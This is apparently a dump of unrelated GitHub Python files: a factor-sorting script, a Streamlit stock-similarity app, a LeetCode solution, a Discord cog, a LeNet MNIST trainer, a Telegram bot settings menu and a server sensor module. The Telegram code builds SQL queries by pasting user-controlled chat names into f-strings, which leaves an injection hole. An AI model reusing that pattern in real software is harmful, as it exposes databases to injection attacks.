'rna', 'cash', 'std_dolvol', 'seas1a',\n 'lgr', 'dolvol', 'nincr', 'turn', 'hire',\n 'mom12m', 'pscore', 'noa', 'rd_sale', 'mom60m',\n 'ato', 'roe', 'rdm', 'sue', 'lev',\n 'mom1m', 'chcsho', 'ni', 'ill', 'chpm',\n 'cfp', 'baspread', 'cashdebt', 'pm', 'abr',\n 'depr', 'rsup', 'bm', 'maxret', 'rvar_capm',\n 'cinvest', 'rvar_mean', 're', 'mom36m',\n 'ep', 'sp', 'gma', 'me_ia', 'zerotrade',\n 'op', 'pctacc', 'chtx', 'rvar_ff3', 'adm',\n 'alm', 'dy', 'std_turn', 'sgr', 'agr',\n 'grltnoa', 'roa']\n# char_list = ['roe','mom12m','beta']\nprint(len(char_list))\nrank_char_list = ['rank_'+i for i in char_list]\n\n# identifiers\nids = ['gvkey','permno','date','ret','lag_me','log_me']\n\n\n# ### delete obs. 
with NA me\n\n# In[5]:\n\n\ndf1 = df[ids+rank_char_list]\nprint(df1.shape)\ndf1 = df1[~df1['lag_me'].isna()]\nprint(df1.shape)\n\n\n# In[6]:\n\n\nprint(df1.head())\n\n\n# # 20210128\n# - do sorting based on the rank\n# - construct decile portfolios\n# - calculate the ls factors\n\n# In[ ]:\n\n\ncs_vw = cs(df1, char_list, 5, 'lag_me')\ncs_vw.update_all(parallel=True)\n\n\n# In[ ]:\n\n\ncs_ew = cs(df1, char_list, 5, 'ew')\ncs_ew.update_all(parallel=True)\n\n\n# In[ ]:\n\n\nwith open('cs_vw.pkl', 'wb') as f:\n pkl.dump(cs_vw, f)\n\nwith open('cs_ew.pkl', 'wb') as f:\n pkl.dump(cs_ew, f)\n\n","repo_name":"xinhe97/SortCS","sub_path":"main_sort_20210202.py","file_name":"main_sort_20210202.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"72243515121","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport matplotlib.pyplot as plt\n\n# -------------------------\n#\n# SESSION STATES\n#\n# -------------------------\n\nif \"labels\" not in st.session_state:\n st.session_state[\"labels\"] = False\n\n\ndef lbl():\n if st.session_state[\"labels\"]:\n st.session_state[\"labels\"] = False\n else:\n st.session_state[\"labels\"] = True\n\n\n# -------------------------\n#\n# CSS\n#\n# -------------------------\n\nst.markdown(\n \"\"\"\n \n\"\"\",\n unsafe_allow_html=True,\n)\n\n# -------------------------\n#\n# FUNCTIONS\n#\n# -------------------------\n\n# define a function to compute the similarity between the last n days and each n-day window in the dataset\ndef compute_similarity(window):\n last_n_days = df[\"Close\"].iloc[-n_window:]\n similarity_scores = cosine_similarity(\n last_n_days.values.reshape(1, -1), window.values.reshape(1, -1)\n )\n return similarity_scores[0]\n\ndef plot_dataframes(df1, df2):\n # Create the plots\n fig, ax = plt.subplots()\n ax.plot(range(1, 22), df1, label=\"Last 14 days\")\n ax.plot(range(1, 22), df2, label=\"Similar case from the past\")\n\n # Set the chart title and legend\n ax.set_title(\"Stock quotes similarity\")\n ax.legend()\n\n # Display the chart using Streamlit\n st.pyplot(fig)\n\ndef create_null_series(length):\n return pd.Series([None] * length)\n\ndef adjust_dataframe(df_past, df, adjust_index):\n return df_past * (df[\"Close\"].iloc[adjust_index:][0] / df_past[0])\n\n# -------------------------\n#\n# INTRO\n#\n# -------------------------\n\nst.title(\"Yet Another Stock Data Analysis\")\n\n# allow user to upload a CSV file containing stock data\nuploaded_file = st.file_uploader(\n \"Upload stock quotes *.csv\",\n type=[\"csv\"],\n help=\"The file has to have at least a Date column and a Close column. Stock quotes should be sorted from oldest to newest. \",\n)\n\n# allow user to play around with the app without uploading the file\nif st.checkbox(\"Use example file\"):\n uploaded_file = \"gs_us_d.csv\"\n\n# allow user to limit analysis period\nyears = st.slider(\"How many years of data take into account?\", 1, 20, 20)\n\n# welcome note and disclaimers\nwith st.sidebar:\n st.write(\"**Welcome note**\")\n st.write(\n \"Welcome to the stock quote analysis app! The app allows users to easily compare the last 14 days of closing stock quotes to all historical 14 day windows. By doing so, similarity scores are calculated and results are presented in the form of tables and graphs. 
Additionally, if available, the app presents relevant major events that affected the stock market for the historical period.\"\n )\n st.write(\n \"\"\"To rescale the historical data to current levels, please select the 'Scale results' checkbox.\"\"\"\n )\n st.write(\"**Disclaimer**\")\n st.write(\n \"Please note that the information provided by this app is for educational and informational purposes only. It is not intended to be used as a basis for making investment decisions. The results presented by the app are based on historical data and are not indicative of future performance. Users are advised to conduct their own research and seek the advice of a qualified financial advisor before making any investment decisions. The app's creators and developers are not responsible for any losses or damages that may occur as a result of using this app or relying on the information provided by it.\"\n )\n st.write(\n \"News headlines were generated using Bing Chat and were not independently reviewed.\"\n )\n\n# -------------------------\n#\n# MAIN APP CODE\n#\n# -------------------------\n\nif uploaded_file is not None:\n\n # ----- data load ----\n\n # we will analysis 14-day periods\n n_window = 14\n\n # let's read data stock quotes from the csv\n df = pd.read_csv(uploaded_file)\n\n if \"Data\" in df.columns:\n df.rename(columns={\"Data\": \"Date\"}, inplace=True)\n if \"Zamkniecie\" in df.columns:\n df.rename(columns={\"Zamkniecie\": \"Close\"}, inplace=True)\n if \"Najwyzszy\" in df.columns:\n df.rename(columns={\"Najwyzszy\": \"Max\"}, inplace=True)\n if \"Najnizszy\" in df.columns:\n df.rename(columns={\"Najnizszy\": \"Min\"}, inplace=True)\n if \"Wolumen\" in df.columns:\n df.rename(columns={\"Wolumen\": \"Volume\"}, inplace=True)\n\n df = df.set_index(\"Date\")\n\n # let's read headlines data\n headlines = pd.read_csv(\"headlines.csv\")\n headlines_m = pd.read_csv(\"headlines_m.csv\")\n\n # ----- data manipulation ----\n\n # create a rolling window of 14 days\n df = df[-years * 365 :]\n rolling_window = df[\"Close\"].rolling(window=n_window)\n\n # if i would like to see all rolling windows in the future i can use this part:\n # dfa = [window.to_list() for window in rolling_window]\n # st.write(dfa)\n\n # compute the similarity between the last n days and each n-day window in the dataset\n similarity_scores = rolling_window.apply(compute_similarity, raw=False)\n similarity_scores = similarity_scores.fillna(value=0)\n top_similarities = similarity_scores.argsort()[-10:]\n\n # define a function to make plots\n\n\n # ----- calculationsn ----\n\n i = 1\n df_past_list = []\n df_past_list_last = []\n for index in top_similarities:\n\n # create a series with 7 null values - this will become usefull in a minute\n null_series = create_null_series(7)\n\n # has to be done in order to provide correct window for the tables and plots\n index = index - (n_window - 1)\n\n # create data frame with n last days\n df1 = df[\"Close\"].iloc[-n_window:]\n\n # concatenate the original series and the null series\n df1_plus_nulls = pd.concat([df1, null_series])\n\n # create a data frame for historical window\n df_past = df[\"Close\"].iloc[index : index + 21]\n\n # create a data frame adjusted for first period\n df_past_adj = df_past * (df[\"Close\"].iloc[-14:][0] / df_past[0])\n\n # create a data frame adjusted for first period\n df_past_adj_last = df_past * (df[\"Close\"].iloc[-1:][0] / df_past[13])\n\n # append lists\n df_past_list.append(df_past_adj.values.tolist())\n 
df_past_list_last.append(df_past_adj_last.values.tolist())\n\n # take into account only periods that large enough to take a peek into the future\n if len(df_past) == 21:\n\n # ----- front end ----\n\n st.markdown(\"---\")\n st.write(\"**Case \" + str(i) + \"**\")\n adjusted = st.checkbox(\"Scale result?\", key=index,value=True)\n\n\n\n\n if adjusted:\n #df_past = df_past * (df[\"Close\"].iloc[-14:][0] / df_past[0])\n df_past = adjust_dataframe(df_past,df,-14)\n col1, col2, col3 = st.columns(3)\n with col1:\n st.write(\"**Last 14 days**\")\n st.write(df1)\n with col2:\n st.write(\"**Similar case from the past**\")\n st.write(df_past)\n with col3:\n # Plot the datasets\n st.write(\"**Plot**\")\n plot_dataframes(df1_plus_nulls, df_past)\n st.write(\"Similarity score\")\n st.write(similarity_scores.iloc[index + 13])\n st.write(\n \"**Major events that affected the stock market in \"\n + str(df.iloc[index].name)[0:7]\n + \"**\"\n )\n if headlines[\"Date\"].eq(df.iloc[index].name).any():\n\n html = str(\n headlines[headlines[\"Date\"] == df.iloc[index].name][\n \"Headlines\"\n ].values[0]\n )\n # st.write(html)\n st.markdown(\n html,\n unsafe_allow_html=True,\n )\n\n else:\n if headlines_m[\"Date\"].eq(df.iloc[index].name[0:7]).any():\n html = str(\n headlines_m[headlines_m[\"Date\"] == df.iloc[index].name[0:7]][\n \"Headlines\"\n ].values[0]\n )\n st.markdown(\n html,\n unsafe_allow_html=True,\n )\n else:\n st.write(\"No data. Chat Bing prompt:\")\n st.write(\n \" *What were the major events that affected the stock market in \"\n + str(df.iloc[index].name[0:7])\n + \"?*\"\n )\n i += 1\n\n st.markdown(\"---\")\n st.write(\"**Results summarized on one chart (scaled to the first period)**\")\n df_past_list = pd.DataFrame(df_past_list)\n # st.write(df_past_list)\n fig, ax = plt.subplots()\n for i in range(0, len(df_past_list)):\n ax.plot(range(1, 22), df_past_list.iloc[i], label=\"Last 14 days\", alpha=0.2)\n ax.plot(\n range(1, 22),\n df1_plus_nulls,\n label=\"Last 14 days\",\n color=\"red\",\n marker=\"o\",\n markersize=3,\n )\n # Set the chart title and legend\n ax.set_title(\"Stock quotes similarity\")\n ax.grid(color=\"grey\", linestyle=\"-\", linewidth=0.1, axis=\"y\")\n\n # Display the chart using Streamlit\n st.pyplot(fig)\n\n if \"projection\" not in st.session_state:\n st.session_state.projection = [None] * 21\n\n st.write(\"**Results summarized on one chart (scaled to the last period)**\")\n\n value = st.slider(\"Select \\% change from last close\", -3.0, 3.0, 0.0)\n col1, col2 = st.columns(2)\n with col1:\n st.code(list(df1_plus_nulls)[13])\n with col2:\n st.code(f\"{(list(df1_plus_nulls)[13] * (1 + value / 100)):.2f}\")\n\n st.session_state.projection[13] = list(df1_plus_nulls)[13]\n st.session_state.projection[14] = list(df1_plus_nulls)[13] * (1 + value / 100)\n\n df_past_list_last = pd.DataFrame(df_past_list_last)\n # st.write(df_past_list)\n fig, ax = plt.subplots()\n for i in range(0, len(df_past_list_last)):\n ax.plot(\n range(1, 22), df_past_list_last.iloc[i], label=\"Last 14 days\", alpha=0.2\n )\n ax.plot(\n range(1, 22),\n df1_plus_nulls,\n label=\"Last 14 days\",\n color=\"red\",\n marker=\"o\",\n markersize=3,\n )\n\n ax.plot(\n range(1, 22),\n st.session_state.projection,\n label=\"Last 14 days\",\n color=\"black\",\n marker=\"o\",\n markersize=3,\n )\n\n if st.session_state[\"labels\"]:\n for i in range(0, 14):\n ax.annotate(\n list(df1_plus_nulls)[i],\n (i, list(df1_plus_nulls)[i]),\n size=8,\n # bbox=dict(boxstyle=\"round4,pad=.5\", fc=\"0.8\"),\n ha=\"center\",\n # 
va=\"top\",\n )\n # Set the chart title and legend\n ax.set_title(\"Stock quotes similarity\")\n ax.grid(color=\"grey\", linestyle=\"-\", linewidth=0.1, axis=\"y\")\n\n # Display the chart using Streamlit\n st.pyplot(fig)\n\n st.checkbox(\"Show labels\", on_change=lbl)\n\n\n# prompts for chat bot\n# What were the major events that affected the stock market in may 2005? Please present them in html code. Do not add references.\n","repo_name":"TomJohnH/streamlit-stock","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":11403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27981269044","text":"class Solution(object):\n\n def removeInvalidParentheses(self, s):\n \"\"\"\n :type s: str\n :rtype: List[str]\n \"\"\"\n global _max\n _max = 0\n \"\"\"\n :Helper function to explore the different strings which can be built\n :result : list[str]\n :current: str\n :lcount: The count of left parenthesis\n :maxcount: The amount of removals performed\n :s: the orignal string\n \"\"\"\n def DFS(result, current, lcount, maxcount, s):\n global _max\n if(len(s) == 0):\n if(lcount == 0 and len(current) != 0):\n if maxcount > _max:\n _max = maxcount\n if _max == maxcount and (current not in result):\n result.append(current)\n return\n else:\n if s[0] == '(':#if its a left parenthesis\n temp = list(current)\n current.append('(')\n DFS(result, current, lcount + 1, maxcount + 1, s[1:])#Either we use it\n current = list(temp)\n DFS(result, current, lcount, maxcount, s[1:])#Or we dont\n elif s[0] == ')':\n if(lcount > 0):#if it is valid to place a right paranthesis\n temp = list(current)\n current.append(')')\n DFS(result, current, lcount - 1, maxcount, s[1:])#Either we use it\n current = list(temp)\n DFS(result, current, lcount, maxcount, s[1:])#Or we dont\n else:#if its any other character\n current.append(s[0])\n DFS(result, current, lcount, maxcount, s[1:])\n\n\n\n result = []\n DFS(result,[],0,0,s)\n if(len(result) == 0):\n result.append([''])\n return [\"\".join(string) for string in result]\n","repo_name":"ArcticFaded/InterviewQuestions","sub_path":"facebook/hard/Remove Invalid Parenthesis/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1423633264","text":"from redbot.core import commands\n\nclass IntroChannelManager(commands.Cog):\n \"\"\"My custom cog\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def introchannelmanager(self, ctx):\n \"\"\"This does stuff!\"\"\"\n # Your code will go here\n await ctx.send(\"I can do stuff!\")","repo_name":"jjodalton/ukfur-cogs","sub_path":"intromanager/introchannelmanager.py","file_name":"introchannelmanager.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32082892272","text":"# 作者 : 杨航\n# 开发时间 : 2022/10/13 14:32\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport cv2\nimport matplotlib.pyplot as plt\n\n(train_images,train_labels),(test_images,test_labels)= tf.keras.datasets.mnist.load_data()\n# 增加维度,便于卷积操作\ntrain_images = train_images.reshape(60000,28,28,1)\ntest_images = test_images.reshape(10000,28,28,1)\n\n# 归一化\ntrain_images = train_images/255\ntest_images = test_images/255\n\n# 标签的独热编码\ntrain_labels = np.array(pd.get_dummies(train_labels))\ntest_labels = 
np.array(pd.get_dummies(test_labels))\n\n# 搭建网络\nmodel = tf.keras.Sequential()\nmodel.add(tf.keras.layers.Conv2D(filters=6,kernel_size=(5,5),input_shape=(28,28,1),padding='same',activation='sigmoid'))\nmodel.add(tf.keras.layers.AveragePooling2D(pool_size=(2,2)))\nmodel.add(tf.keras.layers.Conv2D(filters=16,kernel_size=(5,5),activation='sigmoid'))\nmodel.add(tf.keras.layers.AveragePooling2D(pool_size=(2,2)))\nmodel.add(tf.keras.layers.Conv2D(filters=120,kernel_size=(5,5),activation='sigmoid'))\nmodel.add(tf.keras.layers.Flatten())\nmodel.add(tf.keras.layers.Dense(84,activation='sigmoid'))\nmodel.add(tf.keras.layers.Dense(10,activation='softmax'))\nmodel.summary()\n\n# 模型优化(adam优化器,交叉熵损失函数,记录训练的正确率)\nmodel.compile(optimizer='adam',loss='categorical_crossentropy',metrics=['acc'])\n\n# 训练\n# 训练图片、训练标签作为输入。测试图片、测试标签作为每一轮的验证\nhistory = model.fit(train_images,train_labels,epochs=10,validation_data=(test_images,test_labels))\n\n# 模型评估\nmodel.evaluate(test_images,test_labels)\n# 模型保存\nmodel.save('mnist.h5')\n# 调用模型\nnew_model = tf.keras.models.load_model('mnist.h5')\n\n# 调用模型\nnew_model = tf.keras.models.load_model('mnist.h5')\n# 读取图片(灰度图)\nimg = cv2.imread('F:/PythonRepository/Machine-Learing/picture/3.png',0)\n# plt.imshow(img)\nimg = cv2.resize(img,(28,28)) # 将图片变为28*28的像素\nimg = img.reshape(1,28,28,1) # 调整维度\nimg = img/255 # 归一化\npredict = new_model.predict(img)\nprint(predict)\nresult = np.argmax(predict)\nprint(result)","repo_name":"wooyeonicon/DeepLearning","sub_path":"DeepLearning_tensorflow/LeNet_5.py","file_name":"LeNet_5.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1835547655","text":"import random as r\nimport sqlite3\nfrom typing import Union\n\nfrom telegram import (InlineKeyboardMarkup, InlineKeyboardButton, Update)\nfrom telegram.error import BadRequest\nfrom telegram.ext import CallbackContext\n\nfrom constants import samir, harshil, sql_table\nfrom helpers.logger import logger\nfrom helpers.namer import get_nick, get_chat_name\n\nCURRENT_SETTINGS, UPDATED, PROBABILITY = range(3)\n\nmsg = None\n_type = \"\"\nmorn_setting = \"\"\nprofane_prob = 0.2\nmedia_prob = 0.3\n\nsetting_markup = InlineKeyboardMarkup(\n [[InlineKeyboardButton(text=\"Media reactions 🎛️\", callback_data=\"MEDIA_PROB\")],\n [InlineKeyboardButton(text=\"Profanity reactions 🎛️\", callback_data=\"PROFANE_PROB\")],\n [InlineKeyboardButton(text=\"Morning quote 💬\", callback_data=\"Morning\")],\n [InlineKeyboardButton(text=\"Save changes 💾\", callback_data=\"SAVE\")]\n ]\n)\n\nprob_markup = InlineKeyboardMarkup(\n [[InlineKeyboardButton(text=\"🔙 Back\", callback_data=\"Back\")],\n [InlineKeyboardButton(text=\"🔻10%\", callback_data=str(-0.1)),\n InlineKeyboardButton(text=\"🔻5%\", callback_data=str(-0.05)),\n InlineKeyboardButton(text=\"🔺5%\", callback_data=str(0.05)),\n InlineKeyboardButton(text=\"🔺10%\", callback_data=str(0.1))],\n [InlineKeyboardButton(text=\"⬇0%⬇\", callback_data=str(0.0)),\n InlineKeyboardButton(text=\"⬆100%⬆\", callback_data=str(1.0))]\n ]\n)\n\n\ndef start(update: Update, context: CallbackContext) -> int:\n \"\"\"\n Called when user uses /settings. 
If it is the first time using it, it creates and uses default bot settings.\n Can only be used in groups where user is admin, or in private chats.\n \"\"\"\n global morn_setting, conn, c\n\n chat_id = update.effective_chat.id\n user_id = update.message.from_user.id\n\n try:\n admins = context.bot.get_chat_administrators(chat_id=chat_id) # Get group admins\n except BadRequest: # When it is a private chat\n pass\n else:\n for admin in admins:\n if user_id in (samir, harshil) or admin.user.id == user_id: # Check if admin/creators are calling /settings\n break\n else:\n responses = (\"I'm not allowing you like you say\", \"Ask the permission then only\",\n \"This is not for you okay?\", \"Only few of them can do this not all okay?\",\n \"See not you so sowry\")\n context.bot.send_message(chat_id=chat_id, text=r.choice(responses),\n reply_to_message_id=update.message.message_id)\n del responses\n return -1 # Stop convo since a regular user called /settings\n\n logger(message=f\"/settings\", command=True, update=update)\n\n conn = sqlite3.connect('./files/bot_settings.db')\n c = conn.cursor()\n name = get_nick(update, context)\n\n c.executescript(sql_table) # If table is not made\n conn.commit()\n\n c.execute(f\"SELECT EXISTS(SELECT * FROM CHAT_SETTINGS WHERE chat_id = {chat_id});\") # Returns 0 if doesn't exist\n result = c.fetchone()\n\n if not result[0]:\n c.execute(f\"INSERT INTO CHAT_SETTINGS VALUES({chat_id},'{name}','❌',0.3,0.2);\") # First time use\n conn.commit()\n\n c.execute(f\"SELECT MORNING_MSGS FROM CHAT_SETTINGS WHERE chat_id = {chat_id};\")\n result = c.fetchone()\n morn_setting = result[0]\n\n # Sends the current settings applied-\n if update.callback_query is None:\n context.bot.send_message(chat_id=chat_id, text=setting_msg(update), reply_markup=setting_markup,\n parse_mode=\"MarkdownV2\")\n\n return UPDATED\n\n\ndef setting_msg(update, swap: bool = False) -> str:\n \"\"\"Helper function to modify or create the /settings menu message.\"\"\"\n\n global msg, media_prob, profane_prob, morn_setting\n chat_id = update.effective_chat.id\n results = []\n\n if swap: # Swaps setting when user clicks button.\n if morn_setting == \"✅\":\n morn_setting = \"❌\"\n else:\n morn_setting = \"✅\"\n\n for col in (\"MEDIA_PROB\", \"PROFANE_PROB\"):\n c.execute(f\"SELECT {col} FROM CHAT_SETTINGS WHERE CHAT_ID={chat_id};\")\n result = c.fetchone()\n results.append(result[0]) # Append probability\n results.append(f\"{int(round(result[0] * 100))}%\") # Append corresponding percent\n\n media_prob, media_pct, profane_prob, profane_pct = results\n\n msg = \"See is this the expected behaviour?\\n\\n\" \\\n r\"1\\. _Media reactions:_ \" + f\"{media_pct}\\n\" \\\n r\"2\\. _Profanity reactions:_ \" + f\"{profane_pct}\\n\" \\\n r\"3\\. _Morning quotes:_ \" + f\"{morn_setting}\\n\"\n return msg\n\n\ndef prob_message(update, kind: str, column: str) -> Union[None, str]:\n \"\"\"Helper function to show current probability of corresponding setting.\"\"\"\n\n chat_id = update.effective_chat.id\n\n if column == \"\":\n return\n\n c.execute(f\"SELECT {column} FROM CHAT_SETTINGS WHERE CHAT_ID={chat_id};\")\n result = c.fetchone()\n chance = f\"{int(round(result[0] * 100))}%\" # Rounding it as there could be floating point round off errors.\n\n prob_msg = f\"See now mathematically speaking, the probability of reacting to {kind} is: {chance}\"\n return prob_msg\n\n\ndef prob_updater(update: Update, context: CallbackContext) -> int: # PROBABILITY\n \"\"\"Updates probability when buttons are pressed. 
Also instantly saves those values in the database.\"\"\"\n global media_prob, profane_prob\n\n chat_id = update.effective_chat.id\n call_id = update.callback_query.id\n invalid = False\n\n prob_diff = float(update.callback_query.data)\n\n # Assign probability to common variable for simplicity-\n if _type == \"media\":\n _prob = media_prob\n else:\n _prob = profane_prob\n\n new = _prob + prob_diff # Calculate new probability\n\n if prob_diff in (0.0, 1.0): # When user clicks 0% or 100%\n new = prob_diff\n\n elif not 0.0 <= new <= 1.0:\n invalid = True\n\n col = ''\n if not invalid: # Update database only if entry is valid.\n if _type == \"media\":\n media_prob = new # Set updated value back to original variable for next callback query\n col = \"MEDIA_PROB\"\n else:\n profane_prob = new\n col = \"PROFANE_PROB\"\n\n c.execute(f\"UPDATE CHAT_SETTINGS SET {col}={new} WHERE CHAT_ID={chat_id};\")\n conn.commit()\n\n edit_msg = prob_message(update, kind=_type, column=col)\n\n if edit_msg is not None:\n try:\n update.callback_query.edit_message_text(text=edit_msg, reply_markup=prob_markup)\n except BadRequest: # When user clicks 100% or 0% button again and again.\n pass\n context.bot.answer_callback_query(callback_query_id=call_id)\n\n else: # When message is not edited, i.e. when user is stupid\n context.bot.answer_callback_query(callback_query_id=call_id,\n text=\"Are you confused? Probability is between 0% and 100% okay?\",\n show_alert=True)\n\n return PROBABILITY\n\n\ndef change_prob(update: Update, _: CallbackContext) -> int: # UPDATED\n \"\"\"\n This is run when the user clicks button to change the probability. It is common for both profanity and media\n reactions.\n \"\"\"\n\n global _type, media_prob, profane_prob\n\n data = update.callback_query.data\n\n if data == \"MEDIA_PROB\":\n _type = \"media\"\n else:\n _type = \"profanity\"\n\n update.callback_query.edit_message_text(text=prob_message(update, kind=_type, column=data),\n reply_markup=prob_markup)\n\n return PROBABILITY\n\n\ndef morn_swap(update: Update, context: CallbackContext) -> int: # UPDATED\n \"\"\"Used to swap states of morning quotes.\"\"\"\n\n global morn_setting\n\n update.callback_query.edit_message_text(text=setting_msg(update, swap=True), reply_markup=setting_markup,\n parse_mode=\"MarkdownV2\")\n context.bot.answer_callback_query(callback_query_id=update.callback_query.id) # Clears `loading` in clients.\n\n return UPDATED\n\n\ndef go_back(update: Update, _: CallbackContext) -> int: # PROBABILITY\n \"\"\"Goes back to main menu.\"\"\"\n\n update.callback_query.edit_message_text(text=setting_msg(update), reply_markup=setting_markup,\n parse_mode=\"MarkdownV2\")\n\n return UPDATED\n\n\ndef save(update: Update, _: CallbackContext) -> int: # UPDATED\n \"\"\"Called when user clicks save. 
Saves all applied settings into database.\"\"\"\n\n global morn_setting\n\n chat_id = update.effective_chat.id\n\n responses = (\"I updated my behaviour\", \"See I got the clarity now\", r\"I will now like you do fo\\.\\.follow this\",\n \"Ok I will do this now it's not that hard\", \"I am now in the right direction\")\n\n confirmations = (\"Now I'm like this:\", \"This is okay with me now like:\", \"Okay fine I'm okay with this:\",\n \"I have like you say changed now:\", \"My new behaviour is:\")\n\n # Show settings have been updated-\n update.callback_query.edit_message_text(text=r.choice(responses) + f\"\\n\\n{r.choice(confirmations)}\\n\" + msg[36:],\n parse_mode=\"MarkdownV2\")\n\n logger(message=f\"{update.effective_user.first_name} just updated {get_chat_name(update)}'s settings to:\\n\"\n f\"Media={media_prob}, Profanity={profane_prob}, Morning quotes={morn_setting}.\")\n\n c.execute(f\"UPDATE CHAT_SETTINGS SET MORNING_MSGS='{morn_setting}' WHERE CHAT_ID={chat_id};\")\n conn.commit()\n\n # Checks if group name has changed, if it did, updates in db-\n c.execute(f\"SELECT CHAT_NAME FROM CHAT_SETTINGS WHERE CHAT_ID={chat_id};\") # Gets name from db\n result = c.fetchone()\n name = get_chat_name(update) # Gets name of chat\n\n if name != result[0]: # If the name is not the same, update it in db\n c.execute(f\"UPDATE CHAT_SETTINGS SET CHAT_NAME='{name}' WHERE CHAT_ID={chat_id};\")\n conn.commit()\n\n conn.close() # Close connection, we don't want mem leaks\n del name, chat_id, responses, confirmations, result\n return -1\n","repo_name":"tmslads/Shanispeakbot","sub_path":"convos/settings_gui.py","file_name":"settings_gui.py","file_ext":"py","file_size_in_byte":10124,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"86752215812","text":"from umit.inventory.server.Module import ServerModule\nfrom umit.inventory.server.ServerInterface import ServerInterface\nfrom umit.inventory.server.ServerInterfaceMessages import ResponseFields\nfrom umit.inventory.Configuration import InventoryConfig\n\nimport logging\nimport json\n\n\nclass DeviceSensor(ServerModule):\n\n def __init__(self, configs, shell):\n ServerModule.__init__(self, configs, shell)\n\n self.agent_tracker = None\n self.command_tracker = None\n\n self.device_sensor_host_info = {}\n\n self.request_handlers = {\n 'REAL_TIME_REQUEST' : self.handle_real_time_request,\n 'REAL_TIME_CLOSE' : self.handle_real_time_close,\n 'GET_NOTIFICATION_COND' : self.handle_get_notification_cond,\n 'SET_NOTIFICATION_COND' : self.handle_set_notification_cond,\n 'GET_REPORT_TEMPLATE' : self.handle_get_report_template,\n 'SET_REPORT_TEMPLATE' : self.handle_set_report_template,\n }\n\n # Mapping tuples of gui hostnames and request id's to command id's\n self.active_command_connections = dict()\n\n\n def activate(self):\n logging.info('DeviceSensor: Activating module ...')\n\n # Get the Agent tracker and Command Tracker\n self.agent_listener = self.shell.get_module('AgentListener')\n if self.agent_listener is None:\n err_msg = 'DeviceSensor: Required AgentListener module not installed'\n logging.error(err_msg)\n return\n\n self.command_tracker = self.agent_listener.command_tracker\n self.agent_tracker = self.agent_listener.agent_tracker\n\n\n def deactive(self):\n logging.info('DeviceSensor: Deactivating module ...')\n\n\n def refresh_settings(self):\n pass\n\n\n def get_name(self):\n return 'DeviceSensor'\n\n\n def init_default_settings(self):\n self.options[InventoryConfig.module_enabled] = 
True\n\n\n def init_database_operations(self):\n pass\n\n\n def evaluate_request(self, request, data_connection):\n logging.debug('DeviceSensor: Evaluating request ...')\n \n req_id = request.get_request_id()\n device_sensor_request = DeviceSensorRequest(request)\n if not device_sensor_request.sanity_check():\n logging.warning('DeviceSensor: Invalid request')\n response = ServerInterface.build_invalid_response(req_id)\n data_connection.send_message(json.dumps(response), True)\n return\n\n if self.command_tracker is None:\n logging.warning('DeviceSensor: CommandTracker not found')\n response = ServerInterface.build_internal_error_response(req_id)\n data_connection.send_message(json.dumps(response), True)\n return\n\n request_type = device_sensor_request.get_type()\n try:\n self.request_handlers[request_type](device_sensor_request, req_id,\n data_connection)\n except:\n logging.warning('DeviceSensor: Invalid request type', exc_info=True)\n\n\n def handle_real_time_request(self, device_sensor_request, req_id,\n data_connection):\n agent_hostname = device_sensor_request.get_agent_hostname()\n\n command_id = self.command_tracker.send_command(\n agent_hostname, 'DeviceSensor', 'REAL_TIME_REQUEST',\n handler_function=self.real_time_command_callback,\n handler_user_data=data_connection)\n\n if command_id is None:\n logging.warning('DeviceSensor: Error sending command')\n response = ServerInterface.build_internal_error_response(req_id)\n data_connection.send_message(json.dumps(response), True)\n return\n\n gui_hostname = data_connection.peer_host\n self.active_command_connections[(gui_hostname, req_id)] =\\\n command_id\n\n\n def real_time_command_callback(self, message, command_id,\n handler_user_data, command_connection, closed=False):\n if closed:\n logging.debug('DeviceSensor: Command Connection %d closed',\n command_id)\n message = dict()\n message['state'] = 'DOWN'\n else:\n message['state'] = 'UP'\n\n response = ServerInterface.build_accepted_response(-1)\n response[ResponseFields.response_type] = 'DEVICE_SENSOR_REAL_TIME_REQUEST'\n response[ResponseFields.body] = message\n\n data_connection = handler_user_data\n sent_ok = data_connection.send_message(json.dumps(response), True)\n\n # Check the requesting application didn't went down\n if not sent_ok:\n return False\n\n return True\n\n\n def handle_real_time_close(self, device_sensor_request, req_id,\n data_connection):\n close_request = DeviceSensorRealTimeClose(device_sensor_request)\n if not close_request.sanity_check():\n response = ServerInterface.build_invalid_response(req_id)\n data_connection.send_message(json.dumps(response), True)\n return\n\n original_req_id = close_request.get_request_id()\n gui_hostname = data_connection.peer_host\n try:\n command_id = self.active_command_connections[(gui_hostname,\n original_req_id)]\n agent_hostname = device_sensor_request.get_agent_hostname()\n self.command_tracker.close_command_connection(agent_hostname,\n command_id)\n except:\n pass\n\n response = ServerInterface.build_accepted_response(req_id)\n data_connection.send_message(json.dumps(response), True)\n \n\n def handle_get_notification_cond(self, device_sensor_request,\n req_id, data_connection):\n #TODO\n pass\n\n\n def handle_set_notification_cond(self, device_sensor_request,\n req_id, data_connection):\n #TODO\n pass\n\n\n\n def handle_get_report_template(self, device_sensor_request,\n req_id, data_connection):\n #TODO\n pass\n\n\n def handle_set_report_template(self, device_sensor_request,\n req_id, data_connection):\n #TODO\n 
